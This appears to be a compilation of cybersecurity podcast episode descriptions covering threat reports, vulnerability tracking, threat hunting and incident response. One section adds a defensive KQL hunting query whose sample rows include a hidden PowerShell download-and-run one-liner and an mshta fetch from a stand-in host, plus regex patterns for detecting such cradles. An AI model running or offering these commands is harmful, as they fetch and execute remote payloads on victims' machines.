Forecast = Scattered phishing attempts with a 90% chance of encrypted clouds.

In this episode of Storm⚡️Watch, the crew dissects the evolving vulnerability tracking landscape and the challenges facing defenders as they move beyond the aging CVE system. The show also highlights the rise of sophisticated bot traffic, the expansion of GreyNoise's Global Observation Grid, and fresh tools from VulnCheck and Censys that are helping security teams stay ahead of real-time threats. In our listener poll this week, we ask: what would you do if you found a USB stick? It's a classic scenario that always sparks debate about curiosity versus caution in cybersecurity.

It's officially cyber report season, and we're breaking down the latest findings from some of the industry's most influential threat intelligence teams. GreyNoise's new research spotlights the growing risk from resurgent vulnerabilities: those old flaws that go quiet for years before suddenly making a comeback, often targeting edge devices like routers and VPNs. The FBI's 2024 IC3 report is out, revealing a record $16.6 billion in reported losses last year, with phishing, extortion, and business email compromise topping the charts. Mandiant's M-Trends 2025, VulnCheck's Q1 exploitation trends, and other reports all point to a relentless pace of vulnerability weaponization, with nearly a third of new CVEs being exploited within 24 hours of disclosure.

We also dig into a series of ace blog posts and research from Censys, including their push to end stale indicators and their deep dives into the sharp rise in attacks targeting edge security devices. Their recent work with GreyNoise and CursorAI on botnet hunting, as well as their new threat hunting module, are changing the game for proactive defense. VulnCheck's quarterly report is raising eyebrows with the revelation that 159 vulnerabilities were exploited in Q1 2025 alone, and 28% of those were weaponized within a single day of disclosure. This underscores how quickly attackers are operationalizing new exploits and why defenders need to move faster than ever.

We round out the show with the latest from runZero and a look at GreyNoise's recent findings, including a ninefold surge in Ivanti Connect Secure scanning and a spike in Git configuration crawling, both of which highlight the ongoing risk of codebase exposure and the need for continuous vigilance.

Storm Watch Homepage >> Learn more about GreyNoise >>
Forecast = Prepare for scattered CVEs, rising bot storms, and real-time threat lightning. Keep your digital umbrellas handy!

On this episode of Storm⚡️Watch, we're breaking down the latest shifts in the vulnerability tracking landscape, starting with the ongoing turbulence in the CVE program. As the MITRE-run CVE system faces funding uncertainty and a potential transition to nonprofit status, the global security community is rapidly adapting. New standards and databases are emerging to fill the gaps—Europe's ENISA is rolling out the EU Vulnerability Database to ensure regional control, while China continues to operate its own state-mandated systems. Meanwhile, the CVE ecosystem's chronic delays and the NVD's new “Deferred” status for tens of thousands of older vulnerabilities are pushing teams to look elsewhere for timely, enriched vulnerability data. Open-source projects like OSV.dev and commercial players such as VulnCheck and Snyk are stepping up, offering real-time enrichment, exploit intelligence, and predictive scoring to help organizations prioritize what matters most. The result is a fragmented but innovative patchwork of regional, decentralized, open-source, and commercial solutions, with hybrid approaches quickly becoming the norm for defenders worldwide.

We're also diving into Imperva's 2024 Bad Bot Report, which reveals that nearly a third of all internet traffic last year came from malicious bots. These bots are getting more sophisticated—using residential proxies, mimicking human behavior, and bypassing traditional defenses. The report highlights a surge in account takeover attacks and shows that industries like entertainment and retail are especially hard hit, with bot traffic now outpacing human visitors in some sectors. The rise of simple bots, fueled by easy-to-use AI tools, is reshaping the threat landscape, while advanced and evasive bots continue to challenge even the best detection systems.

On the threat intelligence front, GreyNoise has just launched its Global Observation Grid—now the largest deception sensor network in the world, with thousands of sensors in over 80 countries. This expansion enables real-time, verifiable intelligence on internet scanning and exploitation, helping defenders cut through the noise and focus on the threats that matter. GreyNoise's latest research shows attackers are exploiting vulnerabilities within hours of disclosure, with a significant portion of attacks targeting legacy flaws from years past. Their data-driven insights are empowering security teams to prioritize patching and response based on what's actually being exploited in the wild, not just theoretical risk.

We're also spotlighting Censys and its tools for tracking botnets and advanced threats, including collaborative projects with GreyNoise and CursorAI. Their automated infrastructure mapping and pivoting capabilities are helping researchers quickly identify related malicious hosts and uncover the infrastructure behind large-scale attacks.

Finally, VulnCheck continues to bridge the gap during the CVE program's uncertainty, offering autonomous enrichment, real-time exploit tracking, and comprehensive coverage—including for CVEs that NVD has deprioritized. Their Known Exploited Vulnerabilities catalog and enhanced NVD++ service are giving defenders a broader, faster view of the threat landscape, often surfacing critical exploitation activity weeks before it's reflected in official government feeds. As the vulnerability management ecosystem splinters and evolves, organizations are being forced to rethink their strategies—embracing a mix of regional, open-source, and commercial intelligence to maintain visibility and stay ahead of attackers. The days of relying on a single source of truth for vulnerability data are over, and the future is all about agility, automation, and real-time insight.
Cyber Defense Meets Leadership Mastery!
Please enjoy this encore of Word Notes. The process of proactively searching through networks to detect and isolate security threats, rather than relying on security solutions or services to detect those threats. CyberWire Glossary link: https://thecyberwire.com/glossary/threat-hunting Audio reference link: “My ‘Aha!’ Moment - Methods, Tips, & Lessons Learned in Threat Hunting - SANS THIR Summit 2019.” YouTube, YouTube, 25 Feb. 2020.
This week we dive into security headlines including a botnet bonanza that includes TP-Link routers, Chinese attackers targeting Juniper and Fortinet, and a case study of nation-state actors penetrating the operator of a small US electric utility. We also discuss ransomware attacks targeting critical infrastructure, a backdoor in an Android variant used in streaming devices,...
In this episode of Out of the Woods: The Threat Hunting Podcast, this live discussion focuses on where threat hunters should focus their time to drive real security impact.
How experienced hunters prioritize their time - What matters most in real-world threat hunting.
The biggest mistakes that slow hunters down - Common distractions and how to avoid them.
How to refine your investigative approach - Strategies to ensure your hunts lead to real findings.
Interesting Artifacts:
https://cybersources.site/
https://github.com/FalconForceTeam/FalconHound
https://medium.com/falconforce/falconhound-attack-path-management-for-blue-teams-42adedc9cae5
https://github.com/SpecterOps/BloodHound?tab=readme-ov-file
https://github.com/SpecterOps/BloodHound-Legacy
https://www.youtube.com/watch?v=Pn7GWRXfgeI
https://www.eccouncil.org/cybersecurity-exchange/cyber-talks/cloud-threat-hunting-tactics-for-enhanced-azure-security/
Forecast = Ransomware storms surge with an 87% spike in industrial attacks—brace for ICS strikes from GRAPHITE and BAUXITE! Infostealers hit healthcare and education, while VPN vulnerabilities pour in—grab your digital umbrella!

It's report season and today the crew kicks things off with a breakdown of Veracode's State of Software Security 2025 Report, highlighting significant improvements in OWASP Top 10 pass rates but also noting concerning trends in high-severity flaws and security debt. Next, we take a peek at Dragos's 2025 OT/ICS Cybersecurity Report, which reveals an increase in ransomware attacks against industrial organizations and the emergence of new threat groups like GRAPHITE and BAUXITE. The report also details the evolution of malware targeting critical infrastructure, such as Fuxnet and FrostyGoop. The Huntress 2025 Cyber Threat Report is then discussed, showcasing the dominance of infostealers and malicious scripts in the threat landscape, with healthcare and education sectors being prime targets. The report also highlights the shift in ransomware tactics towards data theft and extortion. The team also quickly covers a recent and _massive_ $1.5 billion Ethereum heist.

We *FINALLY* cover some recent findings from Censys, including their innovative approach to discovering non-standard port usage in Industrial Control System protocols. This segment also touches on the growing threat posed by vulnerabilities in edge security products. We also *FINALLY* get around to checking out VulnCheck's research, including an analysis of Black Basta ransomware group's tactics based on leaked chat logs, and their efforts to automate Stakeholder Specific Vulnerability Categorization (SSVC) for more effective vulnerability prioritization. The episode wraps up with mentions of GreyNoise's latest reports on mass internet exploitation and a newly discovered DDoS botnet, providing listeners with a well-rounded view of the current cybersecurity landscape.
Forecast = Expect a storm of insights as we tackle cybersecurity's cloudy diversity gaps, edge device downpours, and ransomware winds blowing from Black Basta!

In this episode of Storm⚡️Watch, we kick things off with an insightful interview with Mary N. Chaney, the CEO of Minorities in Cybersecurity (MiC). MiC is a groundbreaking organization dedicated to addressing the lack of support and representation for women and minority leaders in cybersecurity. Mary shares how MiC is building a community that fosters leadership development and equips members with essential skills for career advancement. We also discuss the alarming statistics that highlight the underrepresentation of minorities in cybersecurity leadership roles and explore how MiC's programs, like The MiC Inclusive Community™ and The MiC Leadership Series™, are making a tangible difference.

Next, the crew descends into a critical discussion about edge security products, drawing on insights from Censys. These devices, while vital for network protection, are increasingly becoming prime targets for attackers. We examine recent vulnerabilities added to CISA's Known Exploited Vulnerabilities catalog, including flaws in products from Palo Alto Networks and SonicWall, and explore how state-sponsored actors like Salt Typhoon are exploiting these weaknesses. The conversation underscores the importance of proactive patch management and tools like attack surface monitoring to mitigate risks.

In the next segment, we analyze leaked chat logs from the Black Basta ransomware group with insights from VulnCheck. These logs reveal how Black Basta prioritizes vulnerabilities in widely used enterprise technologies, their rapid response to new advisories, and even their pre-publication knowledge of certain CVEs. We break down their strategy for selecting targets based on financial viability, industry focus, and vulnerability presence, offering actionable advice for defenders to stay ahead.

Finally, we turn our attention to GreyNoise's recent observations of active exploitation campaigns targeting Cisco vulnerabilities by Salt Typhoon, a Chinese state-sponsored group. Using data from GreyNoise's Global Observation Grid, we discuss how legacy vulnerabilities like CVE-2018-0171 remain valuable tools for advanced threat actors. This segment highlights the importance of patching unaddressed issues and leveraging real-time threat intelligence to protect critical infrastructure.
Welcome to the third episode of our Energy Talks miniseries titled, Why Should You Talk About Incident Response? Join OMICRON cybersecurity consultant Simon Rommer as he explores the different process steps involved in cybersecurity incident response with other experts from the power industry. In this episode, Simon speaks with Johann Stockinger, Head of Digital Forensics and Incident Response at the Deutsche Telekom Security Operations Center, about the importance of Identification in the incident response process.
Chaos and security concerns continue in Washington. Spanish authorities arrest a man suspected of hacking NATO, the UN, and the US Army. A major U.S. hiring platform exposes millions of resumes. Another British engineering firm suffers a cyberattack. Cisco patches multiple vulnerabilities. Cybercriminals exploit SVG files in phishing attacks. SparkCat SDK targets cryptocurrency via Android and iOS apps. CISA directs federal agencies to patch a high-severity Linux kernel flaw. Thailand leaves scamming syndicates in the dark. Positive trends in the fight against ransomware. Our guest, Cliff Crosland, CEO and Co-founder at Scanner.dev, discusses the evolution of security data lakes and the "bring your own" model for security tools. Don't eff with the FCC.

CyberWire Guest
Today on our Industry Voices segment, guest Cliff Crosland, CEO and Co-founder at Scanner.dev, discusses the evolution of security data lakes and the "bring your own" model for security tools. For some additional details, check out their blog on “Security Data Lakes: A New Tool for Threat Hunting, Detection & Response, and GenAI-Powered Analysis.”

Selected Reading
Musk's DOGE agents access sensitive personnel data, alarming security officials (Washington Post)
Union groups sue Treasury over giving DOGE access to sensitive data (The Record)
Hacker Who Targeted NATO, US Army Arrested in Spain (SecurityWeek)
Hiring platform serves users raw with 5.4 million CVs exposed (Cybernews)
IMI becomes the latest British engineering firm to be hacked (TechCrunch)
Cisco Patches Critical Vulnerabilities in Enterprise Security Product (SecurityWeek)
Scalable Vector Graphics files pose a novel phishing threat (Sophos News)
Crypto-stealing apps found in Apple App Store for the first time (Bleeping Computer)
Ransomware payments dropped in 2024 as victims refused to pay hackers (TechCrunch)
CISA orders agencies to patch Linux kernel bug exploited in attacks (Bleeping Computer)
Thailand cuts power supply to Myanmar scam hubs (The Record)
Robocallers posing as FCC fraud prevention team call FCC staff (Bleeping Computer)

The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc.
We spoke to Will Bengtson (VP of Security Operations at HashiCorp) about the realities of cloud incident response and detection. From root credentials to event-based threats, this conversation dives deep into:
Why cloud security is NOT like on-prem, and how that affects incident response
How attackers exploit APIs in seconds (yes, seconds, not hours!)
The secret to building a cloud detection program that actually works
The biggest detection blind spots in AWS, Azure, and multi-cloud environments
What most SOC teams get WRONG about cloud security

Guest Socials: Will's LinkedIn
Podcast Twitter - @CloudSecPod
If you want to watch videos of this LIVE STREAMED episode and past episodes, check out our other Cloud Security social channels: Cloud Security Podcast - YouTube, Cloud Security Newsletter, Cloud Security BootCamp
If you are interested in AI Cybersecurity, you can check out our sister podcast - AI Cybersecurity Podcast

Questions asked:
(00:00) Introduction
(00:38) A bit about Will Bengtson
(05:41) Is there more awareness of Incident Response in Cloud
(07:05) Native Solutions for Incident Response in Cloud
(08:40) Incident Response and Threat Detection in the Cloud
(11:53) Getting started with Incident Response in Cloud
(20:45) Maturity in Incident Response in Cloud
(24:38) When to start doing Threat Hunting?
(27:44) Threat hunting and detection in MultiCloud
(31:09) Will talks about his BlackHat training with Rich Mogull
(39:19) Secret Detection for Detection Capability
(43:13) Building a career in Cloud Detection and Response
(51:27) The Fun Section
Forecast: Breach storms surge with Chinese actors, Ivanti spreads wider, and malware disguises itself—stay alert and patched!

This episode of Storm⚡️Watch features exciting developments in security tooling and concerning breaches in critical infrastructure. We're thrilled to finally talk about Censeye on the pod! It's Censys's powerful new automated hunting platform that's revolutionizing how security teams conduct threat hunting. This innovative tool combines automation with Censys's comprehensive internet scanning capabilities, complete with new gadgets that enhance threat detection and analysis capabilities.

In major security news, a significant breach at the US Treasury's Committee on Foreign Investment (CFIUS) has been attributed to Chinese state-sponsored actors. This concerning development potentially exposed sensitive data about national security reviews of foreign investments in American companies. The Ivanti vulnerability situation continues to evolve, with UK domain registry giant Nominet now confirming they've been impacted by the recent Ivanti VPN exploits. This development highlights the expanding blast radius of this critical security issue. 2025 has already seen sophisticated threat actors weaponizing exploits, with researchers uncovering an information stealer disguised as a proof-of-concept exploit for the LDAPNightmare vulnerability (CVE-2024-49113).

We'll explore how Censys Search is strengthening phishing prevention through advanced SSL/TLS certificate monitoring, providing organizations with crucial tools to identify and prevent potential phishing campaigns. The episode concludes with an in-depth look at GreyNoise classifications, particularly focusing on suspicious activity patterns identified in the last 24 hours. We'll break down what these classifications mean for security teams and how to leverage this intelligence effectively.
Forecast: Strong vulnerability management systems roll in, with scattered threat hunting ahead. Brace for ProjectSend exploits and turbulence near Kansas City.

In this episode of Storm⚡️Watch, we explore crucial cybersecurity trends and breaking developments across the industry. Our recent community poll revealed fascinating insights into resource allocation priorities, with Vulnerability Management and Patching emerging as the clear frontrunner, chosen by half of respondents. Threat Intelligence and Hunting secured the second spot with 27.3% of votes, while Security Awareness and Incident Response capabilities tied for third place.

Breaking news from Kansas City highlights a significant cybersecurity incident with a federal indictment for computer hacking, demonstrating the ongoing challenges in cybercrime enforcement. Meanwhile, the cybersecurity community continues to experience shifts in social media dynamics, particularly noting the ongoing migration of cyber professionals from X (formerly Twitter) to alternative platforms.

Censys has made waves with their latest release of Censeye, an innovative automated hunting tool now available to the security community. This development arrives alongside VulnCheck's critical discovery of CVE-2024-11680, a ProjectSend vulnerability currently being exploited in the wild, emphasizing the importance of rapid threat detection and response. The GreyNoise team shares exciting news about "The Greyt Migreytion," heralding the rollout of their new global observation grid, a game-changing advancement in threat detection and response.
In this episode, we interview Jean Francois Dive about threat hunting for Cisco's internal security. He takes us through the stakes of a few very recent and famous hacks.
Podcast: PrOTect It All
Episode: The Future of Automation and AI in Operational Technology with Shane Cox
Pub date: 2024-11-25

In Episode 33, Aaron Crow explores the transformative impact of automation and AI in the Operational Technology (OT) sector, joined by industry expert Shane Cox from Morgan Franklin Cyber. This episode digs into how AI and automation can enhance security operations when balanced with human oversight and strategic implementation. Shane Cox shares insights on Morgan Franklin's flexible and expert-driven approach to Managed Detection and Response (MDR) services, emphasizing the importance of tailored client partnerships and continuous collaboration. The discussion highlights the potential of AI to revolutionize security while addressing the unique challenges and risks of integrating automated solutions. Tune in to learn how the right blend of technology, expertise, and strategy can drive effective security solutions and foster long-term client relationships in today's evolving cybersecurity landscape.

Key Moments:
05:15 Flexible, evolving security service, partnership-focused approach.
07:06 Diverse tools are essential for all organizations.
12:58 Weekend setup complete; improved over subsequent months.
15:30 MDR/XDR: Cloud-based threat detection and response.
18:21 Flexible MDR service integrates client environments efficiently.
21:38 Integration speeds up threat detection and response.
24:52 Cautious automation best balances efficiency and control.
29:50 AI assists coding by highlighting potential errors.
32:12 People are crucial for effective security automation.
35:51 Superior team preferred over superior product.
39:06 AI integration risks due to untested promises.
41:46 Adapting security training amidst AI automation challenges.

Guest Profile: Shane Cox leads the Cyber Fusion Center at MorganFranklin Cyber where he is responsible for the delivery of managed services such as Orion MDR, Advanced Detection and Response (ADR), Threat Hunting, Adversary Simulation, Cyber Threat Intelligence (CTI), and Incident Response and Management. Shane has over 25 years of experience in IT and Cyber Security, leading the development and optimization of security programs within enterprise and managed services environments. He has deep experience and success providing customized, business-aligned security outcomes for a diverse range of client environments and industry verticals.
How to connect with Shane:
https://www.linkedin.com/feed/update/urn:li:activity:7264640034891337730
https://www.sdxcentral.com/articles/stringerai-announcements/morganfranklin-consulting-launches-orion-mdr-service-with-stellar-cyber/2024/11/
Connect With Aaron Crow:
Website: www.corvosec.com
LinkedIn: https://www.linkedin.com/in/aaronccrow
Learn more about PrOTect IT All:
Email: info@protectitall.co
Website: https://protectitall.co/
X: https://twitter.com/protectitall
YouTube: https://www.youtube.com/@PrOTectITAll
FaceBook: https://facebook.com/protectitall
To be a guest or suggest a guest/episode, please email us at info@protectitall.co
Please leave us a review on Apple/Spotify Podcasts:
Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124
Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4
Unlock the Power of Network Packet Data in Cybersecurity
In this episode of the Endace Packet Forensics Files, Michael Morris dives into the critical role of network packet data in cybersecurity with Matt Bromiley, a seasoned threat-hunting expert. Matt shares why robust detection systems and proactive threat hunting are essential, and how network data serves as the “glue” that ties together evidence in cybersecurity investigations. The challenges of managing large data volumes, the growing role of AI in threat detection, and the tools needed to stay ahead of emerging threats are explored. Matt provides practical steps to seamlessly integrate packet capture into a threat-hunting toolkit, enabling teams to uncover and respond to even the most elusive threats. Matt emphasizes the importance of implementing a comprehensive packet capture strategy and using advanced tools, including AI, to manage data and enhance detection. He also stresses the need for continuous team training to effectively interpret data and respond to real-time threats, strengthening your defense against complex threats. Don't miss this insightful episode, where Matt shares expert tips on optimizing threat hunting and leveraging packet capture to strengthen your cybersecurity defenses.
Let's talk about Threat Hunting! On this episode of Security Noise, Geoff and Skyler are joined by Principal Security Consultants Shane Hartman and Justin Vaicaro to discuss the essential components of a successful Threat Hunting program. But where do you start and how do you access the best resources? Listen as they share insights on building an effective program, operationalizing practices, and the importance of a proactive mindset. About this podcast: Security Noise, a TrustedSec Podcast hosted by Geoff Walton and Producer/Contributor Skyler Tuter, features our cybersecurity experts in conversation about the security topics that interest them the most.
An excerpt from a great TechTalk we did back in June on Threat Hunting with Memory Forensics given by Monnappa who also teaches Check Point's Threat Hunting Using Memory Forensics course.
In this episode of the Microsoft Threat Intelligence Podcast host Sherrod DeGrippo is joined by the authors of the new book The Definitive Guide to KQL: Using Kusto Query Language for Operations, Defending, and Threat Hunting. Guests Rod Trent, Matt Zorich, and Mark Morowczynski discuss the significance of KQL (Kusto Query Language) in cloud data security and how it enables efficient data querying for threat detection in Microsoft products like Sentinel and Defender. They share insights from their own experiences, highlight key features of the book, and explain how both beginners and experts can benefit from KQL.

Later in the episode Sherrod speaks with Senior Threat Hunter Lekshmi Vijayne about the growing trend of cyberattacks using malicious PowerShell commands. Lekshmi explains how attackers trick users into copying and pasting harmful code, often through compromised websites or phishing emails. They discuss how these attacks aim to install remote access tools like NetSupport RAT or information stealers, targeting sensitive data like browser credentials and crypto keys.

In this episode you'll learn:
How KQL is applied in real-world security scenarios including incident response
Key features and benefits of KQL when it comes to security and cloud data
Distinguishing between legitimate and malicious uses of remote management tools

Some questions we ask:
How does KQL tie into the Microsoft ecosystem, like Defender and Copilot?
What advice would you give to someone new to KQL who wants to start learning?
What is the technique we're seeing with copy-pasting malicious PowerShell?

Resources:
View Mark Morowczynski on LinkedIn
View Matt Zorich on LinkedIn
View Rod Trent on LinkedIn
View Lekshmi Vijayne on LinkedIn
View Sherrod DeGrippo on LinkedIn
Related Microsoft Podcasts:
Afternoon Cyber Tea with Ann Johnson
The BlueHat Podcast
Uncovering Hidden Risks
Discover and follow other Microsoft podcasts at microsoft.com/podcasts
Get the latest threat intelligence insights and guidance at Microsoft Security Insider
The Microsoft Threat Intelligence Podcast is produced by Microsoft and distributed as part of N2K media network.
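One concrete way to hunt for the copy-and-paste PowerShell technique discussed in the episode, written here as an added example that is not from the book or the podcast: the Windows Run dialog and the File Explorer address bar launch whatever the user pastes as a child of explorer.exe, so a PowerShell, mshta or cmd process whose parent is explorer.exe and whose command line hides its window, fetches a payload over HTTP, or carries an encoded command is a strong lead. The column names match the Defender Advanced Hunting table DeviceProcessEvents; the rows are constructed sample events embedded in a datatable so the query runs offline (for example in the Kusto playground), and the regexes, the process list and the example.invalid host are my own choices, not Microsoft's detection logic.

```kql
// Added example, not from the book or the episode. The datatable stands in for
// the Defender Advanced Hunting table DeviceProcessEvents; all rows are constructed.
let SampleProcessEvents = datatable(
    Timestamp:datetime, DeviceName:string, AccountName:string,
    InitiatingProcessFileName:string, FileName:string, ProcessCommandLine:string)
[
  // Row 1 (constructed): Win+R paste, hidden PowerShell window, download-and-run over HTTP
  datetime(2024-09-10 14:02:11), "wks-017", "jdoe", "explorer.exe", "powershell.exe",
    @"powershell.exe -w hidden -nop -c iex(irm http://example.invalid/f.txt)",
  // Row 2 (constructed): same delivery path, but mshta pulling a remote HTA
  datetime(2024-09-10 14:05:40), "wks-017", "jdoe", "explorer.exe", "mshta.exe",
    @"mshta http://example.invalid/a.hta",
  // Row 3 (constructed, benign): admin runs a script from a terminal window
  datetime(2024-09-10 15:10:02), "wks-022", "admin1", "windowsterminal.exe", "powershell.exe",
    @"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
  // Row 4 (constructed, benign): scheduled task launches PowerShell under svchost
  datetime(2024-09-10 16:00:00), "srv-03", "SYSTEM", "svchost.exe", "powershell.exe",
    @"powershell.exe -NonInteractive -File C:\maint\cleanup.ps1"
];
SampleProcessEvents
// Interpreters and LOLBins that pasted one-liners typically start
| where FileName in~ ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
// Run dialog / Explorer address bar launches are children of explorer.exe
| where InitiatingProcessFileName =~ "explorer.exe"
// Markers of a pasted payload: hidden window, download cradle, encoded command
| extend HiddenWindow   = ProcessCommandLine matches regex @"(?i)-w(indowstyle)?\s+h(idden)?",
         DownloadCradle = ProcessCommandLine matches regex @"(?i)(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|mshta\s+https?:)",
         Encoded        = ProcessCommandLine matches regex @"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
| where HiddenWindow or DownloadCradle or Encoded
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
          HiddenWindow, DownloadCradle, Encoded
| order by Timestamp asc
```

Against live data, replace the datatable with `DeviceProcessEvents | where Timestamp > ago(7d)`. Rows 3 and 4 in the sample (a terminal session and a scheduled task) drop out because their parent is not explorer.exe, which is the main property separating pasted one-liners from routine administrative and automation use of PowerShell; a real user can still launch PowerShell from the Run dialog, so treat matches as leads to triage, not verdicts.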
In this episode Michael, Mark and Sarah talk to Matt Zorich and Waymon Ho of the Microsoft GHOST team. We discuss the role GHOST plays in protecting both Microsoft and our customers from nation-state threat actors. We also cover the latest security news about Event Grid, NetApp Files, Chaos Studio and AKS. https://aka.ms/azsecpod
Purav Desai is a Microsoft 365 incident responder at a large financial institution (name withheld to protect the innocent). He shares his journey and expertise in the field. He explains how his early exposure to Microsoft security solutions and their constant innovation led him to specialize in 365 security and incident response. He discusses the importance of mentors and influential figures in his career, highlighting the lessons he learned from them. He then dives into his popular project, Deciphering UAL (Unified Audit Logs), which aims to make sense of the complex logs in Microsoft 365. Purav shares an incident response scenario involving a banking Trojan and how he used telemetry and logging to investigate and remediate the issue. He concludes by discussing effective threat detection methods in Microsoft 365, including threat hunting with KQL and leveraging Zero-Hour Auto-Purge (ZAP) to prevent the spread of attacks.

In our conversation, we dive into:
How specializing in Microsoft 365 security and incident response can be a wise choice due to the constant innovation and market demand for Microsoft solutions.
How having mentors and influential figures in your career can provide valuable guidance and inspire you to push yourself and try new things.
His personal project, Deciphering UAL (Unified Audit Logs), aims to make sense of the complex logs in Microsoft 365, providing insights for digital forensics and incident response.
How proper licensing and logging configuration are crucial for effective incident response.
How native tools like Purview Audit and eDiscovery provide valuable insights for forensic analysis.
The future of cloud security.
In this week's Top 5 Threat Hunting Headlines, Scott and Tom discuss top cybersecurity threats, including Kaspersky's Tusk infostealer campaign, a cloud extortion campaign exploiting AWS environments, APT41's advanced tactics against a Taiwanese research institute, and the Banshee infostealer targeting macOS. They also explore the impact of AI on cybersecurity, emphasizing the need for SOCs to evolve with new talent and strategies to address emerging threats. The episode underscores the importance of staying vigilant and adapting to the rapidly changing threat landscape.
Top 5 Threat Hunting Headlines - 19 Aug 2024
1. Securelist | Tusk Campaign Uses Infostealers and Clippers for Financial Gain https://securelist.com/tusk-infostealers-campaign/113367/
2. Unit 42 | Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
3. Cisco Talos Blog | APT41 Likely Compromised Taiwanese Government-Affiliated Research Institute with ShadowPad and Cobalt Strike https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/?&web_view=true
4. Elastic Security Labs | Beyond the Wail: Deconstructing the BANSHEE Infostealer https://www.elastic.co/security-labs/beyond-the-wail
5. Help Net Security | 74% of IT Professionals Worry That AI Tools Will Replace Them https://www.helpnetsecurity.com/2024/08/15/it-professionals-ai-worry/?web_view=true
-----
Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Top 5 Threat Hunting Headlines - 12 Aug 2024
1. Dark Reading | SaaS Apps Present an Abbreviated Kill Chain for Attackers https://www.darkreading.com/application-security/saas-apps-present-abbreviated-kill-chain-for-attackers?&web_view=true
2. ReasonLabs | New Widespread Extension Trojan Malware Campaign https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign
3. The DFIR Report | Threat Actors' Toolkit: Leveraging Sliver, PoshC2 & Batch Scripts https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/
4. SafeBreach | Downgrade Attacks Using Windows Updates https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/
5. Cyble | Double Trouble: Latrodectus and ACR Stealer Observed Spreading Via Google Authenticator Phishing Site https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/?&web_view=true
In this Brand Story episode, Sean Martin gets to chat with Vivek Ramachandran, Co-Founder and CEO of SquareX, at the Black Hat USA conference in Las Vegas. The discussion centers around SquareX's innovative approach to browser security and its relevance in today's cybersecurity landscape.
Vivek explains that SquareX is developing a browser-native security product designed to detect, mitigate, and hunt threats in real time, specifically focusing on the online activities of enterprise employees. This solution operates entirely within the browser, leveraging advanced technologies like WebAssembly to ensure minimal impact on the user experience.
The conversation shifts to the upcoming DEF CON talk by Vivek, titled “Breaking Secure Web Gateways for Fun and Profit,” which highlights the seven sins of secure web gateways and SASE/SSE solutions. According to Vivek, these cloud proxies often fail to detect and block web attacks due to inherent architectural limitations. He mentions SquareX's research revealing over 25 different bypasses, emphasizing the need for a new approach to tackle these vulnerabilities effectively.
Sean and Vivek further discuss the practical implementation of SquareX's solution. Vivek underscores that traditional security measures often overlook browser activities, presenting a blind spot for many organizations. SquareX aims to fill this gap by providing comprehensive visibility and real-time threat detection without relying on cloud connectivity.
Vivek also answers questions about the automatic nature of the browser extension deployment, ensuring it does not disrupt day-to-day operations for users or IT teams. Additionally, he touches on the importance of organizational training and awareness, helping security teams interpret new types of alerts and attacks that occur within the browser environment.
Towards the end of the episode, Vivek introduces a new attack toolkit designed for organizations to test their own secure web gateways and SASE/SSE solutions, empowering them to identify vulnerabilities firsthand. He encourages security leaders to use this tool and visit a dedicated website for practical demonstrations.
Listeners are invited to connect with Vivek and the SquareX team, especially those attending Black Hat and DEF CON, to learn more about this innovative approach to browser security.
Learn more about SquareX: https://itspm.ag/sqrx-l91
Note: This story contains promotional content.
Guest: Vivek Ramachandran, Founder, SquareX [@getsquarex]
On LinkedIn | https://www.linkedin.com/in/vivekramachandran/
Resources
Learn more and catch more stories from SquareX: https://www.itspmagazine.com/directory/squarex
View all of our Black Hat USA 2024 coverage: https://www.itspmagazine.com/black-hat-usa-2024-hacker-summer-camp-2024-event-coverage-in-las-vegas
Are you interested in telling your story? https://www.itspmagazine.com/telling-your-story
In this conversation, I speak with Christine Gadsby, Head of Product Security Operations Team at BlackBerry. We talk about:
The Role of AI in Cybersecurity: AI's real advancements, practical applications, and associated challenges, moving beyond the hype.
Enhancing Incident Response and Threat Hunting: Christine highlights AI's significant impact on incident response and threat hunting, how AI quickly analyzes vast data to identify Indicators of Compromise (IoCs), automates routine tasks, and improves decision-making with actionable insights.
The Evolution of BlackBerry in Cybersecurity: Christine discusses BlackBerry's shift from mobile devices to cybersecurity, emphasizing their focus on highly regulated environments and how the acquisition of Cylance brought advanced AI capabilities, enhancing their security solutions.
Among other topics.
Chapters:
Intro (00:00:00)
AI in Cybersecurity: Hype or Reality? (00:00:06)
Incident Response and Threat Hunting (00:01:12)
Automation in Security Programs (00:02:08)
Industry-Specific AI Needs (00:03:20)
AI's Role in Regulated Environments (00:04:23)
BlackBerry's AI Integration (00:04:50)
Perceptions of BlackBerry's Evolution (00:06:51)
Trust in Vendor Relationships (00:09:11)
AI's Potential in Monitoring (00:11:12)
Challenges of Staffing in Cybersecurity (00:13:18)
Staff Turnover in Cybersecurity (00:13:54)
Burnout and Job Satisfaction (00:14:18)
Hiring Challenges in Security (00:15:17)
Confusion in Cyber Job Market (00:16:10)
Job Changes Among Cyber Leaders (00:17:10)
Outsourcing Security Functions (00:18:09)
Pressure from Boards (00:18:57)
Evolving Security Needs (00:19:40)
Human Element in Cybersecurity (00:20:46)
Talent Pipeline Issues (00:21:40)
Challenges of Smaller Companies (00:22:32)
Job Satisfaction and Workload (00:24:03)
Pressure Cooker Environment (00:24:43)
Crypto Attacks Resurgence (00:26:16)
Crypto Mining Discussion (00:26:33)
APT32 Insights (00:27:22)
Employee Training Importance (00:28:41)
Indicators of Crypto Mining (00:29:45)
Detection Challenges (00:30:30)
Normal System Behavior (00:32:13)
